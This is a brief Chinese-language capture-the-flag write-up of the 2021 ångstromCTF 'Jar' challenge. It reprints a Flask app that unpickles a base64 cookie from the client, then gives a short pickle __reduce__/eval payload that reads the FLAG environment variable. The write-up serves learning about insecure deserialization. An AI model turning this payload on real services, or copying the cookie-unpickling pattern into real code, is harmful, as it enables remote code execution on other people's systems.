2021ångstromCTF-Jar
https://2021.angstromctf.com/challenges
做了一道外国赛题……
记得做ikun题的时候好像接触过jar(泡菜,python反序列化
不过ikun好难,回来再做做
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
| from flask import Flask, send_file, request, make_response, redirect
import random
import os
app = Flask(__name__)
import pickle
import base64
flag = os.environ.get('FLAG', 'actf{FAKE_FLAG}')
@app.route('/pickle.jpg')
def bg():
return send_file('pickle.jpg')
@app.route('/')
def jar():
contents = request.cookies.get('contents')
if contents: items = pickle.loads(base64.b64decode(contents))
else: items = []
return '<form method="post" action="/add" style="text-align: center; width: 100%"><input type="text" name="item" placeholder="Item"><button>Add Item</button><img style="width: 100%; height: 100%" src="/pickle.jpg">' + \
''.join(f'<div style="background-color: white; font-size: 3em; position: absolute; top: {random.random()*100}%; left: {random.random()*100}%;">{item}</div>' for item in items)
@app.route('/add', methods=['POST'])
def add():
contents = request.cookies.get('contents')
if contents: items = pickle.loads(base64.b64decode(contents))
else: items = []
items.append(request.form['item'])
response = make_response(redirect('/'))
response.set_cookie('contents', base64.b64encode(pickle.dumps(items)))
return response
app.run(threaded=True, host="0.0.0.0")
|
直接给出了源码,直接对对象进行了反序列化,而python中的反序列化是很危险的,利用__reduce__方法,可以在反序列化时使程序执行我们构造的代码:
上面:flag = os.environ.get(‘FLAG’, ‘actf{FAKE_FLAG}’)
甚至为我们构造好了语句……
1
2
3
4
5
6
7
8
9
10
11
12
| import os
import pickle
import urllib
import base64
class test(object):
def __reduce__(self):
return (eval, ("os.environ.get('FLAG', 'actf{FAKE_FLAG}')",))
c=pickle.dumps(test())
d=base64.b64encode(c)
print d
|
找到首尾相连的字母,获取flag……
